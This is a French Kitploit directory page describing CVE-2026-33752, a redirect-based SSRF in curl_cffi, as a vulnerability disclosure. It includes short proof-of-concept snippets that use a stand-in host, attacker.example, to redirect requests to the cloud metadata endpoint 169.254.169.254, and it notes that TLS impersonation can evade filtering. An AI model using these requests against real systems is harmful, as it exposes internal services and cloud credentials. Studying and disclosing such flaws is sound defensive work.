Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-33752 — Démontre une vulnérabilité SSRF basée sur la redirection dans curl_cffi permettant un accès au réseau interne, avec un code PoC et une analyse du contournement de l'usurpation TLS. | Kitploit
Outils/GitHubGitHub/redyank/cve-2026-33752
Analyse des VulnérabilitésExploitationCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubredyank/cve-2026-33752

CVE-2026-33752

Démontre une vulnérabilité SSRF basée sur la redirection dans curl_cffi permettant un accès au réseau interne, avec un code PoC et une analyse du contournement de l'usurpation TLS.

Voir le dépôt
1il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-33752

CVE-2026-33752 (SSRF basé sur les redirections menant à un accès au réseau interne dans curl_cffi)

Résumé

curl_cffi ne restreint pas les requêtes aux plages d'adresses IP internes et suit automatiquement les redirections via la bibliothèque libcurl sous-jacente.

De ce fait, une URL contrôlée par un attaquant peut rediriger des requêtes vers des services internes tels que les points de terminaison de métadonnées cloud. De plus, la fonctionnalité d'usurpation TLS de curl_cffi peut faire apparaître ces requêtes comme un trafic de navigateur légitime, ce qui peut contourner certains contrôles réseau.

Détails

Le problème provient de la manière dont curl_cffi gère les requêtes sortantes

  • Les URL fournies par l'utilisateur sont transmises directement à libcurl sans vérifier si elles résolvent vers des plages d'adresses IP internes (par exemple, 127.0.0.1, 169.254.0.0/16).
  • Les redirections sont automatiquement suivies (CURLOPT_FOLLOWLOCATION = 1) dans libcurl.
  • Aucune validation des destinations de redirection n'est effectuée au niveau de la couche Python.

Cela signifie que même si une application n'autorise que les requêtes vers des URL externes, un attaquant peut

  • Fournir une URL pointant vers un serveur contrôlé par l'attaquant
  • Renvoyer une réponse de redirection pointant vers un service interne
  • Faire en sorte que curl_cffi suive automatiquement cette redirection

Par conséquent, les points de terminaison internes (tels que les API de métadonnées d'instance cloud) peuvent être accessibles.

De plus, curl_cffi prend en charge l'usurpation d'empreinte TLS (par exemple, impersonate="chrome"). Dans les environnements où les requêtes sortantes sont filtrées en fonction de l'empreinte TLS, cela peut rendre ces requêtes plus difficiles à détecter ou à bloquer.

Ce comportement est similaire aux problèmes SSRF basés sur les redirections précédemment signalés, tels que CVE-2025-68616, où les redirections permettaient d'accéder à des ressources internes non intentionnelles.

PoC

  1. Requête interne directe
root@kitploit:~
import curl_cffi
resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
print(resp.text)
  1. Redirection vers un service interne Serveur de l'attaquant :
root@kitploit:~
GET /test
→ 302 Location: http://169.254.169.254/latest/meta-data/

Code de la victime :

root@kitploit:~
import curl_cffi
resp = curl_cffi.get("https://attacker.example/test")
print(resp.text)

Résultat

  • La requête initiale va vers le serveur de l'attaquant
  • La redirection est renvoyée
  • libcurl suit automatiquement la redirection
  • Le point de terminaison de métadonnées interne est accessible
  1. Avec usurpation TLS
root@kitploit:~
import curl_cffi\
resp = curl_cffi.get(
    "https://attacker.example/test",
    impersonate="chrome")

Dans certains environnements, cela peut aider la requête à contourner les contrôles de filtrage basés sur TLS.

Impact

Un attaquant qui peut contrôler l'URL demandée peut être en mesure de :

  • Accéder aux services réseau internes
  • Atteindre les points de terminaison de métadonnées cloud et récupérer des informations sensibles
  • Contourner certains mécanismes de filtrage sortant (selon l'environnement) Cela correspond à CWE-918 Server-Side Request Forgery.
Télécharger l’outil